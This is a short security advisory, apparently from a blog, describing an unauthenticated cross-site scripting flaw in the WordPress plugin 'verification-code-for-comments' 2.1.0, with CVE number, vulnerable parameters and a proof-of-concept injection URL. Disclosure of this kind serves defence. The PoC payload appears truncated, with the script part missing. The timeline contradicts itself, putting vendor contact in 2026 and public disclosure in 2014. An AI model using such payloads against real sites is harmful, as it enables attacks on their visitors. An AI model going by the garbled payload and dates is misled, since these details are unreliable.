wp-plugin : verification-code-for-comments – A3-Cross-Site Scripting (XSS)


Plugin Details


Plugin Name : verification-code-for-comments


Effected Version : 2.1.0 (and most probably lower version's if any)

Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Anant Shrivastava



Technical Details


Minimum Level of Access Required : Unauthenticated


PoC - (Proof of Concept) :


http://localhost/wp-content/plugins/verification-code-for-comments/vcc.js.php?vp=vp’>// &vs=vs’>// &l=l’>// &vu=vu’>// &vm=vm’>// &


Vulnerable Parameters : vp,vs,l,vu,vm


Disclosure Timeline


Vendor Contacted : 2026-01-15

Plugin Status : Closed
Public Disclosure : June 12, 2014
CVE Number : CVE-2014-4565

Plugin Description :
Add an verification code when user posting a comment to keep robots away. You can use an image verification code or a math equation instead.

Robots may post lots of spam comments into your database. You can add a verification code image or a math equation to avoid this.


* You can choose a verification code image or a math equation as you wish
* You don't need to edit any source code of WP, you just need to active the plugin

Leave a Reply

Your email address will not be published. Required fields are marked *